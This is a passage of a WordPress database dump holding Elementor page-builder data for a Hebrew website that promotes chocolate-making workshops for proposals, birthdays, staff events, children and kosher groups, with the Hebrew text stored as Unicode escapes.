\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd.<br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8.<br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2393,442,'_elementor_edit_mode','builder'),(2394,442,'_elementor_template_type','wp-page'),(2395,442,'_elementor_version','2.7.5'),(2396,442,'_elementor_pro_version','2.7.3'),(2397,442,'_wp_page_template','elementor_header_footer'),(2398,442,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2399,442,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\",\"header_size\":\"h1\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":59,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc 